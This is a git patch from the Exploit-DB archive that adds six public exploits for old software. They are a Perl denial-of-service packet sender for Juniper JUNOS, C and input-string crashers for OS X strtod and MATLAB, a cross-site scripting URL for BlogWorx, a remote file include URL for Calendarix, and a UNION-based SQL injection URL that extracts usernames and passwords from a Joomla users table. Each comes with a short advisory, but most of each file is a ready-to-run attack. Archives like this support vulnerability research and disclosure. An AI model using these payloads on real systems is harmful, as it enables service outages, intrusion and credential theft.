From d9c7bc59dbacf6390419278b7a546baabd53734a Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 24 May 2014 04:36:31 +0000
Subject: [PATCH] Updated 05_24_2014

---
 files.csv                       |  6 ++++++
 platforms/asp/webapps/33481.txt |  9 +++++++++
 platforms/hardware/dos/33476.pl | 30 ++++++++++++++++++++++++++++++
 platforms/linux/dos/33480.txt   |  9 +++++++++
 platforms/osx/dos/33479.c       | 17 +++++++++++++++++
 platforms/php/webapps/33477.txt |  9 +++++++++
 platforms/php/webapps/33478.txt |  7 +++++++
 7 files changed, 87 insertions(+)
 create mode 100755 platforms/asp/webapps/33481.txt
 create mode 100755 platforms/hardware/dos/33476.pl
 create mode 100755 platforms/linux/dos/33480.txt
 create mode 100755 platforms/osx/dos/33479.c
 create mode 100755 platforms/php/webapps/33477.txt
 create mode 100755 platforms/php/webapps/33478.txt

diff --git a/files.csv b/files.csv
index 322710d99..d37e9f28b 100755
--- a/files.csv
+++ b/files.csv
@@ -30159,3 +30159,9 @@ id,file,description,date,author,platform,type,port
 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0
 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0
 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0
+33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
+33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0
+33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection Vulnerability",2010-01-08,N0KT4,php,webapps,0
+33479,platforms/osx/dos/33479.c,"Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0
+33480,platforms/linux/dos/33480.txt,"MATLAB  R2009b 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0
+33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 'forum.asp' Cross Site Scripting Vulnerability",2010-01-09,Cyber_945,asp,webapps,0
diff --git a/platforms/asp/webapps/33481.txt b/platforms/asp/webapps/33481.txt
new file mode 100755
index 000000000..13201b71f
--- /dev/null
+++ b/platforms/asp/webapps/33481.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37695/info
+
+DevWorx BlogWorx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BlogWorx 1.0 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln] 
\ No newline at end of file
diff --git a/platforms/hardware/dos/33476.pl b/platforms/hardware/dos/33476.pl
new file mode 100755
index 000000000..5cf77cd31
--- /dev/null
+++ b/platforms/hardware/dos/33476.pl
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/37670/info
+
+JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets.
+
+JUNOS is also prone to six other unspecified security vulnerabilities. These issues may include privilege-escalation or denial-of-service issues.
+
+JUNOS 7.x, 8.x, and 9.x are affected. JUNOS 10.x is not believed to be affected. 
+
+#!/usr/bin/perl
+
+my $host =      shift;
+my $port =      shift;
+
+use             Net::Packet qw($Env);
+
+use             Net::Packet::IPv4;
+my $ip =        Net::Packet::IPv4->new(dst => $host);
+
+use             Net::Packet::TCP;
+
+my $tcp =       Net::Packet::TCP->new(
+                    dst         => $port,
+                    options     =>  "\x65\x02\x01\x01", 
+                );
+
+use             Net::Packet::Frame;
+my $frame =     Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
+
+$frame->send;
+exit 0;
\ No newline at end of file
diff --git a/platforms/linux/dos/33480.txt b/platforms/linux/dos/33480.txt
new file mode 100755
index 000000000..57d0cbfd2
--- /dev/null
+++ b/platforms/linux/dos/33480.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37688/info
+
+MATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+MATLAB R2009b is affected; other versions may also be vulnerable. 
+
+cxib=0.<?php echo str_repeat("1",296450); ?> 
\ No newline at end of file
diff --git a/platforms/osx/dos/33479.c b/platforms/osx/dos/33479.c
new file mode 100755
index 000000000..57387a1e5
--- /dev/null
+++ b/platforms/osx/dos/33479.c
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/37687/info
+
+Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+Mac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable. 
+
+#include <stdio.h>
+#include <stdlib.h>
+int main ()
+{
+char number[] = "0.1111111111...11", *e;
+double weed = strtod(number, &e);
+printf("grams = %lf\n", weed);
+return 0;
+} 
\ No newline at end of file
diff --git a/platforms/php/webapps/33477.txt b/platforms/php/webapps/33477.txt
new file mode 100755
index 000000000..450f6fa12
--- /dev/null
+++ b/platforms/php/webapps/33477.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37673/info
+
+Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Calendarix 0.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cal_config.inc.php?calpath= EVIL SITE??? 
\ No newline at end of file
diff --git a/platforms/php/webapps/33478.txt b/platforms/php/webapps/33478.txt
new file mode 100755
index 000000000..f07e562b2
--- /dev/null
+++ b/platforms/php/webapps/33478.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37686/info
+
+The Jobads component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users-- 
\ No newline at end of file